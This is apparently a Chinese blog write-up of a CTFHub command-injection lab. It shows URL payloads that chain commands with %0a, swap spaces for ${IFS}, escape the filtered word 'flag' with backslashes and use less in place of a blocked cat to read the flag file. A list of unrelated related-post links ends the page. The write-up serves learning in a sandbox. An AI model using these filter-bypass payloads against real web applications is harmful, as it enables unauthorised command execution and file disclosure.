CTFHub 命令注入-综合练习(学习记录)

综合过滤练习

命令分隔符的绕过姿势

;

%0a

%0d

&

那我们使用%0a试试,发现ls命令被成功执行

复制代码
/?ip=127.0.0.1%0als

发现一个名为flag_is_here的文件夹和index.php的文件,那么我们还是使用cd命令进入到文件夹下

http://challenge-438c1c1fb670566b.sandbox.ctfhub.com:10800/?ip=127.0.0.1 cd flag_is_here%0als

发现空格和flag被过滤,空格绕过前面已经讲述,这里就不在赘述,直接尝试${IFS}进行空格绕过,使用fla\g反斜杠转义flag

复制代码
/?ip=127.0.0.1%0als${IFS}f\lag_is_here

成功读取flag_is_here文件夹下的内容

接下来,直接使用cat读取flag_300121897522180.php文件里的内容

发现过滤了cat,前面也讲过cat的绕过姿势,这里不在赘述,直接尝试less

复制代码
/?ip=127.0.0.1%0Acd${IFS}f\lag_is_here%0Aless${IFS}f\lag_3879302014865.php

命令执行成功,查看页面源代码得到flag

相关推荐
peace..31 分钟前
温湿度变送器与电脑进行485通讯连接并显示在触摸屏中(mcgs)
经验分享·学习·其他
软件黑马王子1 小时前
C#系统学习第八章——字符串
开发语言·学习·c#
strongwyy4 小时前
蓝牙墨水屏上位机学习(2)
学习
九皇叔叔4 小时前
(3)手摸手-学习 Vue3 之 变量声明【ref 和 reactive】区别
学习
The_cute_cat6 小时前
Ajax和Axios的初步学习
前端·学习·ajax
amazinging6 小时前
北京-4年功能测试2年空窗-报培训班学测开-第四十三天
python·学习
祁思妙想7 小时前
八股学习(五)---MySQL
学习
虾球xz7 小时前
CppCon 2018 学习:THE MOST VALUABLE VALUES
开发语言·c++·学习
丰锋ff8 小时前
计网学习笔记第2章 物理层(灰灰题库)
笔记·学习
Chef_Chen9 小时前
从0开始学习R语言--Day39--Spearman 秩相关
开发语言·学习·r语言